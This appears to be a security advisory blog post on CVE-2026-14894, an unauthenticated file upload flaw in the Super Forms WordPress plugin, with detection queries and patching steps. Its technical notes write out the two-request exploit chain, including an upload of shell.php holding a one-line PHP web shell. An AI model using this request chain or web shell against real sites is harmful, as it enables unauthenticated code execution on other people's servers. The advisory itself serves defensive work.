CVE-2026-14894: Unauthenticated file upload in Super Forms WordPress plugin
TL;DR - Critical WordPress plugin flaw allows unauthenticated arbitrary file upload. - Super Forms versions up to and including 6.3.313 are affected. - Patch immediately, review uploads, and hunt for suspicious
admin-ajax.phpactivity.
Vulnerability at a Glance
| Field | Value |
|---|---|
| CVE ID | CVE-2026-14894 |
| CVSS score | 9.8 (Critical) |
| Attack vector | Network |
| Privileges required | None |
| Patch available | Yes, but the exact fixed version number is not conclusively confirmed in the retrieved primary advisory text |
CVE-2026-14894 is a critical unauthenticated arbitrary file upload vulnerability in the Super Forms – Drag & Drop Form Builder plugin for WordPress. The issue affects all versions up to and including 6.3.313 and can result in remote code execution if an attacker uploads executable content that the server will process.
From a defender’s perspective, the headline risk is simple: an internet-exposed WordPress site running a vulnerable Super Forms version may be compromised without authentication. NVD explicitly states exploitation can be performed in two unauthenticated HTTP requests, which materially lowers the effort needed to weaponize the bug even if no public proof of concept is confirmed yet.
What Is This Vulnerability?
This vulnerability is not a single control failure. It is a combination of insecure design and implementation issues in the plugin’s form submission handling. According to the NVD description, the vulnerable path is the submit_form unauthenticated AJAX handler. That means the function is reachable by unauthenticated visitors, which is not inherently unsafe on its own, but becomes dangerous when authorization and input validation are weak or missing.
The root cause has three parts. First, there is missing file type validation, so attacker-supplied files may not be adequately restricted. Second, there is no capability check protecting the submit_form nopriv AJAX action, so anonymous users can reach the upload path. Third, the plugin relies on a nonce barrier that is effectively meaningless because another unauthenticated endpoint, super_create_nonce, can mint a valid sf_nonce and related session state for any visitor. In practical terms, that means the application exposes both the lock and the key to the public internet.
Technical Notes
At a high level, the exploit chain described by NVD works like this:
- Send an unauthenticated request to the nonce-creation action.
- Receive a valid
sf_nonceand session cookie. - Submit a second unauthenticated request to the form handler with an uploaded file.
- If the uploaded file is executable or can be interpreted by the server, achieve code execution.
A simplified request flow may look like this:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
action=super_create_nonce
Followed by:
POST /wp-admin/admin-ajax.php HTTP/1.1
Host: example.com
Content-Type: multipart/form-data; boundary=----x
Cookie: PHPSESSID=...
------x
Content-Disposition: form-data; name="action"
submit_form
------x
Content-Disposition: form-data; name="sf_nonce"
<valid nonce>
------x
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/octet-stream
<?php system($_GET['cmd']); ?>
------x--
The exact parameter names and file field handling should be confirmed against local traffic and the vendor patch commit before using them operationally in testing.
Who Is Affected?
The affected product is Super Forms – Drag & Drop Form Builder for WordPress. Based on the available source material, all versions up to and including 6.3.313 are vulnerable. This affected range is stated in the NVD description and corroborated by the Wordfence vulnerability listing for the plugin.
What is not conclusively confirmed from the retrieved advisory text is the exact fixed version number. The available evidence supports that a patched release exists after 6.3.313, and the NVD record references a fix commit in the upstream GitHub repository. However, without a vendor changelog or release note explicitly naming the remediating version, defenders should avoid guessing. If you are on 6.3.313 or earlier, treat the instance as vulnerable. If you have already updated, verify the installed plugin version against the latest vendor release and review the referenced fix commit where possible.
This primarily affects organizations running self-managed WordPress sites, especially those with public-facing forms and broad plugin attack surface exposure. Shared hosting environments may face additional risk if uploaded files are placed in web-accessible locations and PHP execution is permitted in upload paths. Managed WordPress providers may mitigate some post-upload impact through platform controls, but that should not be assumed without validation.
CVSS Score Breakdown
NVD assigns this issue a CVSS v3.x base score of 9.8, which places it in the Critical range. Even without the full vector string in the provided tool output, the score is consistent with a remotely exploitable flaw that requires no privileges, can be triggered over the network, and has severe downstream impact.
In practical terms, the likely score drivers are straightforward. The attack vector is network because exploitation occurs via HTTP requests to WordPress AJAX endpoints. Privileges required are none because both the nonce minting action and the vulnerable submission path are reachable by unauthenticated users. User interaction is effectively absent from the attacker workflow as described by NVD. The impact is high because arbitrary file upload can lead to confidentiality, integrity, and availability compromise once executable code lands on the server.
For administrators, the important takeaway is not just the number. A 9.8 on a WordPress plugin handling public requests usually means high-volume scanning can follow quickly, especially when exploitation involves a short and reliable request chain. Whether or not active exploitation is confirmed today, the exposure profile warrants emergency handling.
Exploitation Status
As of the available source material, active exploitation in the wild is not confirmed. The CVE is not listed in the CISA Known Exploited Vulnerabilities catalog at the time of lookup. That is useful context, but it should not be treated as a safety signal. KEV absence only means there is no current CISA catalog entry, not that the bug is difficult or unused by attackers.
A public proof of concept is not confirmed from the retrieved references either. That said, NVD’s own description materially reduces uncertainty because it explains that exploitation can be completed in two unauthenticated HTTP requests. For defenders, that means exploit development effort is probably low. If a PoC is published after disclosure, mass scanning and opportunistic compromise of WordPress sites could follow quickly.
Operationally, the correct status to communicate is:
- PoC public: not confirmed from retrieved sources
- Active exploitation: not confirmed from retrieved sources
- CISA KEV: not listed
- Defender assumption: exploitation is plausible and likely to become commoditized because the attack path is simple
How to Detect It
Detection should focus on two things: requests to the relevant WordPress AJAX actions and post-exploitation evidence in upload directories or web-accessible file paths. Start with web server logs for admin-ajax.php and look for requests containing either action=super_create_nonce or action=submit_form, especially when they originate from the same client within a short time window and are followed by suspicious requests for newly uploaded files.
You should also inspect the WordPress filesystem for recently created .php, .phtml, .phar, or double-extension files in upload-related directories. Because the root cause involves insufficient file type validation, look beyond obvious filenames. Attackers often use names such as image.php, invoice.php.jpg, or random alphanumeric files placed in writable locations.
Technical Notes
Example grep patterns for Apache or Nginx access logs:
grep -E 'admin-ajax\.php.*(super_create_nonce|submit_form)' /var/log/apache2/access.log
grep -E 'admin-ajax\.php.*(super_create_nonce|submit_form)' /var/log/nginx/access.log
Example pattern to find suspicious executable files under WordPress content directories:
find /var/www/html/wp-content -type f \( -name "*.php" -o -name "*.phtml" -o -name "*.phar" \) -printf "%TY-%Tm-%Td %TH:%TM %p\n" | sort
A simple Splunk query for web logs:
index=web sourcetype IN (apache_access, nginx_access)
("POST /wp-admin/admin-ajax.php" AND ("action=super_create_nonce" OR "action=submit_form"))
| stats count min(_time) as first_seen max(_time) as last_seen by src_ip, host, uri, user_agent
| convert ctime(first_seen) ctime(last_seen)
A basic Sigma-style logic pattern defenders can translate:
title: WordPress Super Forms Suspicious AJAX Exploitation Pattern
logsource:
category: webserver
detection:
selection1:
cs-uri-stem: "/wp-admin/admin-ajax.php"
cs-uri-query|contains: "action=super_create_nonce"
selection2:
cs-uri-stem: "/wp-admin/admin-ajax.php"
cs-uri-query|contains: "action=submit_form"
condition: selection1 or selection2
level: high
Also review for follow-on requests to freshly uploaded files, sudden 200 responses on unusual PHP files under /wp-content/, and outbound connections from the web server process.
Mitigation and Patching
The primary mitigation is to upgrade Super Forms immediately to a vendor-fixed release later than 6.3.313. Based on the available evidence, versions 6.3.313 and earlier are vulnerable, and a patch exists downstream of that release. However, because the exact fixed version number is not conclusively confirmed in the retrieved advisory text, defenders should install the latest available release from the vendor or official WordPress distribution source and verify that it includes the fix associated with the referenced GitHub commit.
If you cannot patch immediately, your interim goal is to reduce exploitability and limit post-upload execution. Temporary workarounds may include disabling the plugin, restricting access to admin-ajax.php where feasible, or placing execution controls on upload directories so that even a successful upload does not execute as PHP. Be careful with blanket admin-ajax.php restrictions, as they may break legitimate site functionality. For business-critical sites, test compensating controls before rollout.
Technical Notes
Check the installed plugin version with WP-CLI:
wp plugin list | grep super-forms
Update to the latest available release:
wp plugin update super-forms
If you need to disable the plugin immediately while assessing impact:
wp plugin deactivate super-forms
A common hardening control is to block PHP execution in upload paths. For Apache, an example .htaccess control in uploads directories is:
<FilesMatch "\.(php|phtml|phar)$">
Require all denied
</FilesMatch>
For Nginx, a defensive location block may look like:
location ~* ^/wp-content/uploads/.*\.(php|phtml|phar)$ {
deny all;
}
After patching, assume compromise is possible if the site was exposed while vulnerable. Rotate WordPress admin credentials, review newly created users, inspect scheduled tasks, compare core files and plugin directories against known-good versions, and consider restoring from a clean backup if you identify webshell activity.
References
The authoritative public source for this CVE is the NVD record, which describes the vulnerability as an unauthenticated arbitrary file upload caused by missing file type validation, absent capability checks on the submit_form nopriv AJAX handler, and a trivially bypassed nonce mechanism exposed through super_create_nonce. It also states that exploitation can be completed in two unauthenticated requests.
The NVD record also points to the upstream GitHub fix commit, which is the most relevant code-level reference for change validation, and to Wordfence ecosystem intelligence showing the affected range as Super Forms <= 6.3.313 with patch status indicated as patched. Since the exact fixed version number is not explicitly confirmed in the retrieved text, defenders should use these references to validate the current vendor release before closing remediation.
- NVD CVE record: https://nvd.nist.gov/vuln/detail/CVE-2026-14894
- GitHub fix commit referenced by NVD: https://github.com/RensTillmann/super-forms/commit/c5838f5877c72b738c54ed970935c77ae6830c3a
- Wordfence vulnerability record: https://www.wordfence.com/threat-intel/vulnerabilities/id/e9c7fb16-efbb-41e9-be13-98e96c1e9100?source=cve
- Wordfence plugin vulnerability page: https://www.wordfence.com/threat-intel/vulnerabilities/wordpress-plugins/super-forms
- Super Forms documentation site: https://docs.super-forms.com
For further reading on related security topics, check out our articles on what is asymmetric encryption and the man-in-the-middle attack.
This article may contain affiliate links. We earn a commission on qualifying purchases at no extra cost to you.